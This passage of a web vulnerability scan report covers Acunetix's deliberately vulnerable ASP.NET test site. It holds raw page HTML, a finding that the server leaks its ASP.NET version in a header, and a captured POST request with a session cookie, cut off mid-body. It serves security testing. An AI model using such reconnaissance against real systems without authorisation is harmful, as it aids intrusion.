          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        27. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAg